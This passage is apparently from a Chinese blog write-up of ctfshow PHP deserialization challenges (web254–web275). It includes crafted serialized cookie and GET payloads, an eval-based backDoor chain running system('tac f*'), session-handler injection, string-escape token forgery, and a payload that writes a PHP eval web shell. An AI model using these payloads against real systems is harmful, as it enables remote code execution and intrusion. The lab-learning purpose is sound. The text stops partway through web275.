\u6765\u68c0\u67e5\u4e0d\u5b58\u5728\u6216\u8005\u4e0d\u53ef\u8bbf\u95ee\u7684\u5c5e\u6027\u65f6\u89e6\u53d1 <br>&lt;?php<br>class wea5e1{<br> &nbsp;  public $name=\"wea5e1\";<br> &nbsp;  public $age = \"18\";<br> &nbsp;  public function __isset($name){<br> &nbsp; &nbsp; &nbsp;  echo 'isset\u89e6\u53d1';<br> &nbsp; &nbsp; &nbsp;  echo \"\\n\";<br> &nbsp;  }<br>}<br>$a = new wea5e1();<br>isset($a-&gt;sb);<br>echo serialize($a); \/\/isset\u89e6\u53d1<br>O:6:\"wea5e1\":2:{s:4:\"name\";s:6:\"wea5e1\";s:3:\"age\";s:2:\"18\";}<\/pre>\n\n\n\n<h4 class=\"wp-block-heading\">unset():<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\">\u4f7f\u7528 unset() \u5220\u9664\u4e00\u4e2a\u4e0d\u5b58\u5728\u6216\u4e0d\u53ef\u8bbf\u95ee\u7684\u5c5e\u6027\u65f6\u89e6\u53d1 \u4e3e\u4e2a\u6817\u5b50\uff1a<br>&lt;?php<br>class wea5e1{<br> &nbsp;  public $name=\"wea5e1\";<br> &nbsp;  public $age = \"18\";<br> &nbsp;  public function __unset($name){<br> &nbsp; &nbsp; &nbsp;  echo 'unset\u89e6\u53d1';<br> &nbsp; &nbsp; &nbsp;  echo \"\\n\";<br> &nbsp;  }<br>}<br>$a = new wea5e1();<br>unset($a-&gt;sb);<br>echo serialize($a); \/\/unset\u89e6\u53d1<br>O:6:\"wea5e1\":2:{s:4:\"name\";s:6:\"wea5e1\";s:3:\"age\";s:2:\"18\";}<\/pre>\n\n\n\n<h4 class=\"wp-block-heading\">invoke()<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\">\u5f53\u5c06\u4e00\u4e2a\u5bf9\u8c61\u50cf\u51fd\u6570\u4e00\u6837\u8c03\u7528\u65f6\u89e6\u53d1 \u4e3e\u4e2a\u6817\u5b50\uff1a<br>&lt;?php<br>class wea5e1{<br> &nbsp;  public $name=\"wea5e1\";<br> &nbsp;  public $age = \"18\";<br> &nbsp;  public function __invoke($name){<br> &nbsp; &nbsp; &nbsp;  echo 'invoke\u89e6\u53d1';<br> &nbsp; &nbsp; &nbsp;  echo \"\\n\";<br> &nbsp;  }<br>}<br>$a = new wea5e1();<br>echo $a('s');<br>echo serialize($a); \/\/invoke\u89e6\u53d1<br>O:6:\"wea5e1\":2:{s:4:\"name\";s:6:\"wea5e1\";s:3:\"age\";s:2:\"18\";}<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">show\u9898\u901f\u5237<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">web254<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">include('flag.php');<br>\u200b<br>class ctfShowUser{<br> &nbsp;  public $username='xxxxxx';<br> &nbsp;  public $password='xxxxxx';<br> &nbsp;  public $isVip=false;<br>\u200b<br> &nbsp;  public function checkVip(){<br> &nbsp; &nbsp; &nbsp;  return $this-&gt;isVip;<br> &nbsp;  }<br> &nbsp;  public function login($u,$p){<br> &nbsp; &nbsp; &nbsp;  if($this-&gt;username===$u&amp;&amp;$this-&gt;password===$p){<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  $this-&gt;isVip=true;<br> &nbsp; &nbsp; &nbsp;  }<br> &nbsp; &nbsp; &nbsp;  return $this-&gt;isVip;<br> &nbsp;  }<br> &nbsp;  public function vipOneKeyGetFlag(){<br> &nbsp; &nbsp; &nbsp;  if($this-&gt;isVip){<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  global $flag;<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  echo \"your flag is \".$flag;<br> &nbsp; &nbsp; &nbsp;  }else{<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  echo \"no vip, no flag\";<br> &nbsp; &nbsp; &nbsp;  }<br> &nbsp;  }<br>}<br>\u200b<br>$username=$_GET['username'];<br>$password=$_GET['password'];<br>\u200b<br>if(isset($username) &amp;&amp; isset($password)){<br> &nbsp;  $user = new ctfShowUser();<br> &nbsp;  if($user-&gt;login($username,$password)){<br> &nbsp; &nbsp; &nbsp;  if($user-&gt;checkVip()){<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  $user-&gt;vipOneKeyGetFlag();<br> &nbsp; &nbsp; &nbsp;  }<br> &nbsp;  }else{<br> &nbsp; &nbsp; &nbsp;  echo \"no vip,no flag\";<br> &nbsp;  }<br>}<br>ez,\u6ee1\u8db3isVip=true\u5373\u53ef\uff0cget\u76f4\u63a5\u4f20username=xxxxxx&amp;password=xxxxxx<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">web255<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">include('flag.php');<br>\u200b<br>class ctfShowUser{<br> &nbsp;  public $username='xxxxxx';<br> &nbsp;  public $password='xxxxxx';<br> &nbsp;  public $isVip=false;<br>\u200b<br> &nbsp;  public function checkVip(){<br> &nbsp; &nbsp; &nbsp;  return $this-&gt;isVip;<br> &nbsp;  }<br> &nbsp;  public function login($u,$p){<br> &nbsp; &nbsp; &nbsp;  return $this-&gt;username===$u&amp;&amp;$this-&gt;password===$p;<br> &nbsp;  }<br> &nbsp;  public function vipOneKeyGetFlag(){<br> &nbsp; &nbsp; &nbsp;  if($this-&gt;isVip){<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  global $flag;<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  echo \"your flag is \".$flag;<br> &nbsp; &nbsp; &nbsp;  }else{<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  echo \"no vip, no flag\";<br> &nbsp; &nbsp; &nbsp;  }<br> &nbsp;  }<br>}<br>\u200b<br>$username=$_GET['username'];<br>$password=$_GET['password'];<br>\u200b<br>if(isset($username) &amp;&amp; isset($password)){<br> &nbsp;  $user = unserialize($_COOKIE['user']); &nbsp; &nbsp;<br> &nbsp;  if($user-&gt;login($username,$password)){<br> &nbsp; &nbsp; &nbsp;  if($user-&gt;checkVip()){<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  $user-&gt;vipOneKeyGetFlag();<br> &nbsp; &nbsp; &nbsp;  }<br> &nbsp;  }else{<br> &nbsp; &nbsp; &nbsp;  echo \"no vip,no flag\";<br> &nbsp;  }<br>}<br>\u53cd\u5e8f\u5217\u5316\u53ef\u4ee5\u76f4\u63a5\u5199\u51fa\u6765(\u53ea\u8981\u8ba9isVip=true\u5373\u53ef)(\u8bb0\u5f97url\u7f16\u7801)\uff1a<br>GET username=xxxxxx&amp;password=xxxxxx<br>COOKIE user=O%3A11%3A%22ctfShowUser%22%3A1%3A%7Bs%3A5%3A%22isVip%22%3Bb%3A1%3B%7D<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">web256<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">include('flag.php');<br>\u200b<br>class ctfShowUser{<br> &nbsp;  public $username='xxxxxx';<br> &nbsp;  public $password='xxxxxx';<br> &nbsp;  public $isVip=false;<br>\u200b<br> &nbsp;  public function checkVip(){<br> &nbsp; &nbsp; &nbsp;  return $this-&gt;isVip;<br> &nbsp;  }<br> &nbsp;  public function login($u,$p){<br> &nbsp; &nbsp; &nbsp;  return $this-&gt;username===$u&amp;&amp;$this-&gt;password===$p;<br> &nbsp;  }<br> &nbsp;  public function vipOneKeyGetFlag(){<br> &nbsp; &nbsp; &nbsp;  if($this-&gt;isVip){<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  global $flag;<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  if($this-&gt;username!==$this-&gt;password){<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  echo \"your flag is \".$flag;<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  }<br> &nbsp; &nbsp; &nbsp;  }else{<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  echo \"no vip, no flag\";<br> &nbsp; &nbsp; &nbsp;  }<br> &nbsp;  }<br>}<br>\u200b<br>$username=$_GET['username'];<br>$password=$_GET['password'];<br>\u200b<br>if(isset($username) &amp;&amp; isset($password)){<br> &nbsp;  $user = unserialize($_COOKIE['user']); &nbsp; &nbsp;<br> &nbsp;  if($user-&gt;login($username,$password)){<br> &nbsp; &nbsp; &nbsp;  if($user-&gt;checkVip()){<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  $user-&gt;vipOneKeyGetFlag();<br> &nbsp; &nbsp; &nbsp;  }<br> &nbsp;  }else{<br> &nbsp; &nbsp; &nbsp;  echo \"no vip,no flag\";<br> &nbsp;  }<br>}<br>&lt;?php<br>    class ctfShowUser{<br>        public $isVip=true;<br>        public $username='wea5e1';<br>        public $password='hhhh';<br>    }<br>    $a = new ctfShowUser();<br>    echo urlencode(serialize($a));\/\/\u4ee3\u7801\u76f4\u63a5\u5ba1\u8ba1\u51fa\u6765<br>GET: username=wea5e1&amp;password=hhhh<br>cookie:user=O%3A11%3A%22ctfShowUser%22%3A3%3A%7Bs%3A5%3A%22isVip%22%3Bb%3A1%3Bs%3A8%3A%22username%22%3Bs%3A6%3A%22wea5e1%22%3Bs%3A8%3A%22password%22%3Bs%3A4%3A%22hhhh%22%3B%7D<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">web257<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">class ctfShowUser{<br> &nbsp;  private $username='xxxxxx';<br> &nbsp;  private $password='xxxxxx';<br> &nbsp;  private $isVip=false;<br> &nbsp;  private $class = 'info';<br>\u200b<br> &nbsp;  public function __construct(){<br> &nbsp; &nbsp; &nbsp;  $this-&gt;class=new info();<br> &nbsp;  }<br> &nbsp;  public function login($u,$p){<br> &nbsp; &nbsp; &nbsp;  return $this-&gt;username===$u&amp;&amp;$this-&gt;password===$p;<br> &nbsp;  }<br> &nbsp;  public function __destruct(){<br> &nbsp; &nbsp; &nbsp;  $this-&gt;class-&gt;getInfo();<br> &nbsp;  }<br>\u200b<br>}<br>class info{<br> &nbsp;  private $user='xxxxxx';<br> &nbsp;  public function getInfo(){<br> &nbsp; &nbsp; &nbsp;  return $this-&gt;user;<br> &nbsp;  }<br>}<br>class backDoor{<br> &nbsp;  private $code;<br> &nbsp;  public function getInfo(){<br> &nbsp; &nbsp; &nbsp;  eval($this-&gt;code);<br> &nbsp;  }<br>}<br>\u200b<br>$username=$_GET['username'];<br>$password=$_GET['password'];<br>\u200b<br>if(isset($username) &amp;&amp; isset($password)){<br> &nbsp;  $user = unserialize($_COOKIE['user']);<br> &nbsp;  $user-&gt;login($username,$password);<br>}<br>\u8981\u51fa\u6765flag\uff0c\u9700\u8981\u4f7f\u7528eval\u8fd9\u4e2a\u547d\u4ee4\uff0ceval-&gt;backDoor,\u90a3\u4e48\u5982\u4f55\u8981\u4f7f\u7528backDoor\u8fd9\u4e2a\u7c7b\u5462\uff0c\u76f4\u63a5\u4f7f\u7528__construct\u8fd9\u4e2a\u9b54\u672f\u65b9\u6cd5<br>&lt;?php<br>class ctfShowUser{<br> &nbsp;  private $username='xxxxxx';<br> &nbsp;  private $password='xxxxxx';<br> &nbsp;  private $isVip=false;<br> &nbsp;  private $class = 'info';<br>\u200b<br> &nbsp;  public function __construct(){<br> &nbsp; &nbsp; &nbsp;  $this-&gt;class=new backDoor();<br> &nbsp;  }<br>\u200b<br>}<br>\u200b<br>class backDoor{<br> &nbsp;  private $code=\"system('tac f*');\";<br>}<br>$a = new ctfShowUser();<br>echo urlencode(serialize($a));<br>?username=xxxxxx&amp;password=xxxxxx<br>user=O%3A11%3A%22ctfShowUser%22%3A4%3A%7Bs%3A21%3A%22%00ctfShowUser%00username%22%3Bs%3A6%3A%22xxxxxx%22%3Bs%3A21%3A%22%00ctfShowUser%00password%22%3Bs%3A6%3A%22xxxxxx%22%3Bs%3A18%3A%22%00ctfShowUser%00isVip%22%3Bb%3A0%3Bs%3A18%3A%22%00ctfShowUser%00class%22%3BO%3A8%3A%22backDoor%22%3A1%3A%7Bs%3A14%3A%22%00backDoor%00code%22%3Bs%3A17%3A%22system%28%27tac+f%2A%27%29%3B%22%3B%7D%7D<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">web258<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">class ctfShowUser{<br> &nbsp;  public $username='xxxxxx';<br> &nbsp;  public $password='xxxxxx';<br> &nbsp;  public $isVip=false;<br> &nbsp;  public $class = 'info';<br>\u200b<br> &nbsp;  public function __construct(){<br> &nbsp; &nbsp; &nbsp;  $this-&gt;class=new info();<br> &nbsp;  }<br> &nbsp;  public function login($u,$p){<br> &nbsp; &nbsp; &nbsp;  return $this-&gt;username===$u&amp;&amp;$this-&gt;password===$p;<br> &nbsp;  }<br> &nbsp;  public function __destruct(){<br> &nbsp; &nbsp; &nbsp;  $this-&gt;class-&gt;getInfo();<br> &nbsp;  }<br>\u200b<br>}<br>\u200b<br>class info{<br> &nbsp;  public $user='xxxxxx';<br> &nbsp;  public function getInfo(){<br> &nbsp; &nbsp; &nbsp;  return $this-&gt;user;<br> &nbsp;  }<br>}<br>\u200b<br>class backDoor{<br> &nbsp;  public $code;<br> &nbsp;  public function getInfo(){<br> &nbsp; &nbsp; &nbsp;  eval($this-&gt;code);<br> &nbsp;  }<br>}<br>\u200b<br>$username=$_GET['username'];<br>$password=$_GET['password'];<br>\u200b<br>if(isset($username) &amp;&amp; isset($password)){<br> &nbsp;  if(!preg_match('\/[oc]:\\d+:\/i', $_COOKIE['user'])){<br> &nbsp; &nbsp; &nbsp;  $user = unserialize($_COOKIE['user']);<br> &nbsp;  }<br> &nbsp;  $user-&gt;login($username,$password);<br>}<br>\u548c\u524d\u9762\u7684\u57fa\u672c\u6ca1\u6709\u533a\u522b\uff0c\u5c31\u662f\u591a\u4e86\u4e00\u4e2awaf<br>\u7ed9\u524d\u9762\u7684\u4ee3\u7801\u52a0\u4e2a$a = serialize($a);<br>$a = str_replace('O:','O:+',$a);\u5373\u53ef\uff0c\u8bb0\u5f97echo urlencode($a);\u8fd9\u4e2a<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">web259<\/h3>\n\n\n\n<p>\u8fd9\u4e2a\u8981\u4f7f\u7528ssrf\uff0c\u4ee5\u540e\u6253<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">web260<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;?php<br>\u200b<br>error_reporting(0);<br>highlight_file(__FILE__);<br>include('flag.php');<br>\u200b<br>if(preg_match('\/ctfshow_i_love_36D\/',serialize($_GET['ctfshow']))){<br> &nbsp;  echo $flag;<br>}<br>\u55ef\uff0c\u76f4\u63a5\u5199\u53cd\u5e8f\u5217\u5316\u5c31\u884c<br>ctfshow=O:18:ctfshow_i_love_36D{},\u76f4\u63a5\u51fa\u6765<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">web261<\/h3>\n\n\n\n<p>\u524d\u7f6e\u77e5\u8bc6<\/p>\n\n\n\n<p>\u5728php7.4.0\u5f00\u59cb\uff0c\u5982\u679c\u7c7b\u4e2d\u540c\u65f6\u5b9a\u4e49\u4e86 <strong>unserialize() \u548c<\/strong> wakeup() \u4e24\u4e2a\u9b54\u672f\u65b9\u6cd5\uff0c\u5219\u53ea\u6709 <strong>unserialize() \u65b9\u6cd5\u4f1a\u751f\u6548\uff0c<\/strong>wakeup() \u65b9\u6cd5\u4f1a\u88ab\u5ffd\u7565\u3002<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;?php<br>\u200b<br>highlight_file(__FILE__);<br>\u200b<br>class ctfshowvip{<br> &nbsp;  public $username;<br> &nbsp;  public $password;<br> &nbsp;  public $code;<br>\u200b<br> &nbsp;  public function __construct($u,$p){<br> &nbsp; &nbsp; &nbsp;  $this-&gt;username=$u;<br> &nbsp; &nbsp; &nbsp;  $this-&gt;password=$p;<br> &nbsp;  }<br> &nbsp;  public function __wakeup(){<br> &nbsp; &nbsp; &nbsp;  if($this-&gt;username!='' || $this-&gt;password!=''){<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  die('error');<br> &nbsp; &nbsp; &nbsp;  }<br> &nbsp;  }<br> &nbsp;  public function __invoke(){<br> &nbsp; &nbsp; &nbsp;  eval($this-&gt;code);<br> &nbsp;  }<br>\u200b<br> &nbsp;  public function __sleep(){<br> &nbsp; &nbsp; &nbsp;  $this-&gt;username='';<br> &nbsp; &nbsp; &nbsp;  $this-&gt;password='';<br> &nbsp;  }<br> &nbsp;  public function __unserialize($data){<br> &nbsp; &nbsp; &nbsp;  $this-&gt;username=$data['username'];<br> &nbsp; &nbsp; &nbsp;  $this-&gt;password=$data['password'];<br> &nbsp; &nbsp; &nbsp;  $this-&gt;code = $this-&gt;username.$this-&gt;password;<br> &nbsp;  }<br> &nbsp;  public function __destruct(){<br> &nbsp; &nbsp; &nbsp;  if($this-&gt;code==0x36d){<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  file_put_contents($this-&gt;username, $this-&gt;password);<br> &nbsp; &nbsp; &nbsp;  }<br> &nbsp;  }<br>}<br>unserialize($_GET['vip']);<br>\u7136\u540e\uff0cincoke\u4e5f\u65e0\u6cd5\u4f7f\u7528\uff0c\u53ea\u80fd\u9760\u6211\u4eec\u7684file_put_contents\u5927\u4eba\u4e86<br>$this-&gt;code = $this-&gt;username.$this-&gt;password; \u5f31\u7c7b\u578b\u6bd4\u8f83\uff0c\u53ea\u8981\u524d\u9762\u7684\u662f877\u5c31\u884c<br>&lt;?php<br>class ctfshowvip{<br> &nbsp;  public $username=\"877.php\";<br> &nbsp;  public $password='&lt;?php @eval($_POST[a]); ?&gt;';<br>}<br>$a=new ctfshowvip();<br>echo urlencode(serialize($a));<br>\/\/vip=O%3A10%3A%22ctfshowvip%22%3A2%3A%7Bs%3A8%3A%22username%22%3Bs%3A7%3A%22877.php%22%3Bs%3A8%3A%22password%22%3Bs%3A26%3A%22%3C%3Fphp+%40eval%28%24_POST%5Ba%5D%29%3B+%3F%3E%22%3B%7D<br>\/\/\u7136\u540e\u8bbf\u95ee877.php\uff0cRCE\u6216\u8005\u8681\u5251\u8fde\u63a5<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">web262<\/h3>\n\n\n\n<p>ok\uff0c\u5230\u91cd\u70b9\u4e86\uff0c\u5b57\u7b26\u4e32\u9003\u9038<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">class message{<br> &nbsp;  public $from;<br> &nbsp;  public $msg;<br> &nbsp;  public $to;<br> &nbsp;  public $token='user';<br> &nbsp;  public function __construct($f,$m,$t){<br> &nbsp; &nbsp; &nbsp;  $this-&gt;from = $f;<br> &nbsp; &nbsp; &nbsp;  $this-&gt;msg = $m;<br> &nbsp; &nbsp; &nbsp;  $this-&gt;to = $t;<br> &nbsp;  }<br>}<br>\u200b<br>$f = $_GET['f'];<br>$m = $_GET['m'];<br>$t = $_GET['t'];<br>\u200b<br>if(isset($f) &amp;&amp; isset($m) &amp;&amp; isset($t)){<br> &nbsp;  $msg = new message($f,$m,$t);<br> &nbsp;  $umsg = str_replace('fuck', 'loveU', serialize($msg));<br> &nbsp;  setcookie('msg',base64_encode($umsg));<br> &nbsp;  echo 'Your message has been sent';<br>}<br>\u200b<br>highlight_file(__FILE__);<br>\u8fd9\u91cc\u626b\u63cf\u51fa\u6765\u4e86\u4e00\u4e2amessage.php<br>include('flag.php');<br>\u200b<br>class message{<br> &nbsp;  public $from;<br> &nbsp;  public $msg;<br> &nbsp;  public $to;<br> &nbsp;  public $token='user';<br> &nbsp;  public function __construct($f,$m,$t){<br> &nbsp; &nbsp; &nbsp;  $this-&gt;from = $f;<br> &nbsp; &nbsp; &nbsp;  $this-&gt;msg = $m;<br> &nbsp; &nbsp; &nbsp;  $this-&gt;to = $t;<br> &nbsp;  }<br>}<br>\u200b<br>if(isset($_COOKIE['msg'])){<br> &nbsp;  $msg = unserialize(base64_decode($_COOKIE['msg']));<br> &nbsp;  if($msg-&gt;token=='admin'){<br> &nbsp; &nbsp; &nbsp;  echo $flag;<br> &nbsp;  }<br>}<br>\u8981\u6c42token\u7684\u503c\u4e3aadmin,\u8fd9\u91cc\u5c31\u662f\u8981\u9003\u9038\";s:5:\"token\";s:5:\"admin\";}<br>\u4e0a\u9762\u662ffuck -&gt; loveU \u9003\u9038\u4e86\u4e00\u4e2a\u5b57\u7b26\u4e32 27\u4e2a\u5b57\u7b26\uff0c\u898127\u4e2afuck\u4e86<br>f=1&amp;m=2&amp;t=fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck\";s:5:\"token\";s:5:\"admin\";} \u7136\u540e\u8bbf\u95eemessage.php ok\u4e86<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">web263<\/h3>\n\n\n\n<p>\u8fdb\u884c\u626b\u63cf\u51fa\u6765\u662fwww.zip,\u7136\u540e\u770b<\/p>\n\n\n\n<p>inc.php<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">class User{<br> &nbsp;  public $username;<br> &nbsp;  public $password;<br> &nbsp;  public $status;<br> &nbsp;  function __construct($username,$password){<br> &nbsp; &nbsp; &nbsp;  $this-&gt;username = $username;<br> &nbsp; &nbsp; &nbsp;  $this-&gt;password = $password;<br> &nbsp;  }<br> &nbsp;  function setStatus($s){<br> &nbsp; &nbsp; &nbsp;  $this-&gt;status=$s;<br> &nbsp;  }<br> &nbsp;  function __destruct(){<br> &nbsp; &nbsp; &nbsp;  file_put_contents(\"log-\".$this-&gt;username, \"\u4f7f\u7528\".$this-&gt;password.\"\u767b\u9646\".($this-&gt;status?\"\u6210\u529f\":\"\u5931\u8d25\").\"----\".date_create()-&gt;format('Y-m-d H:i:s'));<br> &nbsp;  }<br>}\u6709\u7684\u6ca1\u6709\u7528\u4e86\uff0c\u5c31\u4e0d\u590d\u5236\u4e86<br>\u63a5\u4e0b\u6765\u53ea\u80fd\u9760\u6211\u4eec\u7684file_put_contents\u5927\u4eba\u4e86<\/pre>\n\n\n\n<p>index.php<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">if(isset($_SESSION['limit'])){<br>        $_SESSION['limti']&gt;5?die(\"\u767b\u9646\u5931\u8d25\u6b21\u6570\u8d85\u8fc7\u9650\u5236\"):$_SESSION['limit']=base64_decode($_COOKIE['limit']);<br>        $_COOKIE['limit'] = base64_encode(base64_decode($_COOKIE['limit']) +1);<br>    }else{<br>         setcookie(\"limit\",base64_encode('1'));<br>         $_SESSION['limit']= 1;<br>    }<br>    <br>?&gt;<br>\u55ef\uff0cbase64\u89e3\u5bc6\uff0c\u56e0 inc\/inc.php \u5b58\u5728 ini_set(\u2018session.serialize_handler\u2019, \u2018php\u2019); \u548c session_start(); \uff0c\u53ea\u8981\u8bbf\u95ee\u5373\u4f1a\u83b7\u53d6\u4e4b\u524d\u5199\u5165\u7684 session \u6570\u636e\uff0c\u7136\u540e check.php \u5305\u542b inc\/inc.php \uff0c\u5373\u4f1a\u89e6\u53d1 User\u7c7b \u7684 __destruct\u65b9\u6cd5 \uff0c\u4ece\u800c\u628a\u6076\u610f\u6570\u636e\u901a\u8fc7 file_put_contents \u5199\u5165\u540d\u4e3a log-$this.username \uff0c\u5185\u5bb9\u4e3a $this.password \u7684\u6587\u4ef6<br>\u52a0 '|' \u662f\u56e0\u4e3a session.serialize_handler \u4f7f\u7528 php\u5f15\u64ce \uff0csession \u5173\u8054\u6570\u7ec4\u7684 key \u548c value \u662f\u901a\u8fc7 '|' \u533a\u5206\u7684\uff0c value \u662f\u9700\u8981\u88ab\u53cd\u5e8f\u5217\u5316\u7684\u90e8\u5206\u3002\u7136\u540e\u9ed8\u8ba4\u4e0d\u662f\u7528 php \u5f15\u64ce\uff0c\u6240\u4ee5\u5199\u5165\u662f\u6b63\u5e38\u5b57\u7b26\u4e32\uff0c\u5728 inc\/inc.php \u8fd9\u8bfb\u53d6\u8bed\u4e49\u53c8\u4e0d\u4e00\u6837\u4e86<br>&lt;?php<br>class User<br>{<br> &nbsp;  public $username;<br> &nbsp;  public $password;<br> &nbsp;  function __construct()<br> &nbsp;  {<br> &nbsp; &nbsp; &nbsp;  $this-&gt;username = 'my6n.php';<br> &nbsp; &nbsp; &nbsp;  $this-&gt;password = '&lt;?php system(\\'tac flag.php\\')?&gt;';<br> &nbsp;  }<br>}<br>$u = new User();<br>echo urlencode(base64_encode('|' . serialize($u)));\u5199\u547d\u4ee4<br>\u7136\u540e\u8bbf\u95eeindex.php\u9875\u9762\uff0c\u8bb2\u53cd\u5e8f\u5217\u5316\u6570\u636e\u901a\u8fc7cookie\u91cc\u9762\u7684session\u4f20\u8fdb\u53bb\uff0c\u7136\u540e\u8bbf\u95eecheck.php\u9875\u9762\uff0c\u8bb0\u5f97\u6539session\u91cc\u9762\u7684\u503c\u4e3aMQ==\u5c31\u662f1(nnd,\u6211\u8bf4\u600e\u4e48\u6ca1\u6709\u51fa\u6765)\uff0c\u5c31\u662f\u901a\u8fc7check.php\u5305\u542binc.php\uff0c\u4ece\u800c\u89e6\u53d1__destruct\u8fd9\u4e2a\u9b54\u672f\u65b9\u6cd5\uff0c\u6210\u529f\u5199\u5165\uff0c\u4ece\u800c\u5f62\u6210RCE\uff0c\u6210\u529f\u51fa\u6765flag<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">web264<\/h3>\n\n\n\n<p>\u4e0e262\u7684\u505a\u6cd5\u57fa\u672c\u4e00\u6837\uff0c\u4e0d\u8fc7cookie\u8981\u52a0msg=a\u8fd9\u4e2a\u503c<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">web265<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">include('flag.php');<br>highlight_file(__FILE__);<br>class ctfshowAdmin{<br> &nbsp;  public $token;<br> &nbsp;  public $password;<br>\u200b<br> &nbsp;  public function __construct($t,$p){<br> &nbsp; &nbsp; &nbsp;  $this-&gt;token=$t;<br> &nbsp; &nbsp; &nbsp;  $this-&gt;password = $p;<br> &nbsp;  }<br> &nbsp;  public function login(){<br> &nbsp; &nbsp; &nbsp;  return $this-&gt;token===$this-&gt;password;<br> &nbsp;  }<br>}<br>\u200b<br>$ctfshow = unserialize($_GET['ctfshow']);<br>$ctfshow-&gt;token=md5(mt_rand());<br>\u200b<br>if($ctfshow-&gt;login()){<br> &nbsp;  echo $flag;<br>}<\/pre>\n\n\n\n<p>\u55ef\uff0c\u8981\u8ba9token\u7684\u503c===password\u7684\u503c\uff0c\u8fd9\u91cc\u53ef\u4ee5\u4f7f\u7528\u5730\u5740\u8c03\u7528<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;?php<br>class ctfshowAdmin{<br> &nbsp;  public $token;<br> &nbsp;  public $password;<br>\u200b<br> &nbsp;  public function __construct(){<br> &nbsp; &nbsp; &nbsp;  $this-&gt;token='wea5e1';<br> &nbsp; &nbsp; &nbsp;  $this-&gt;password = &amp; $this -&gt; token;<br> &nbsp;  }<br>}<br>$a = new ctfshowAdmin();<br>echo urlencode(serialize($a));<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">web266<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">class ctfshow{<br> &nbsp;  public $username='xxxxxx';<br> &nbsp;  public $password='xxxxxx';<br> &nbsp;  public function __construct($u,$p){<br> &nbsp; &nbsp; &nbsp;  $this-&gt;username=$u;<br> &nbsp; &nbsp; &nbsp;  $this-&gt;password=$p;<br> &nbsp;  }<br> &nbsp;  public function login(){<br> &nbsp; &nbsp; &nbsp;  return $this-&gt;username===$this-&gt;password;<br> &nbsp;  }<br> &nbsp;  public function __toString(){<br> &nbsp; &nbsp; &nbsp;  return $this-&gt;username;<br> &nbsp;  }<br> &nbsp;  public function __destruct(){<br> &nbsp; &nbsp; &nbsp;  global $flag;<br> &nbsp; &nbsp; &nbsp;  echo $flag;<br> &nbsp;  }<br>}<br>$ctfshowo=@unserialize($cs);<br>if(preg_match('\/ctfshow\/', $cs)){<br> &nbsp;  throw new Exception(\"Error $ctfshowo\",1);<br>}<\/pre>\n\n\n\n<p>\u548c\u9760\u524d\u9762\u7684\u5173\u57fa\u672c\u5dee\u4e0d\u591a\uff0c\u5c31\u662f\u8fc7\u6ee4\u4e86ctfshow\uff0c\u5927\u5c0f\u5199\u7ed5\u8fc7\u5c31\u884c\uff0c\u4e0d\u8fc7\u8bb0\u5f97\u5728bp\u91cc\u9762\u76f4\u63a5POST\u4f20<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;?php<br>class ctfshow{<br> &nbsp;  public $username='xxxxxx';<br> &nbsp;  public $password='xxxxxx';<br>}<br>$a = new ctfshow();<br>$a = serialize($a);<br>$a = str_replace('ctfshow','CTFSHOW',$a);<br>echo $a;<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">web267-web274<\/h3>\n\n\n\n<p>\u4e0d\u4f1a\uff0c\u665a\u70b9\u518d\u5199<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">web275<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">class filter{<br> &nbsp;  public $filename;<br> &nbsp;  public $filecontent;<br> &nbsp;  public $evilfile=false;<br>\u200b<br> &nbsp;  public function __construct($f,$fn){<br> &nbsp; &nbsp; &nbsp;  $this-&gt;filename=$f;<br> &nbsp; &nbsp; &nbsp;  $this-&gt;filecontent=$fn;<br> &nbsp;  }<br> &nbsp;  public function checkevil(){<br> &nbsp; &nbsp; &nbsp;  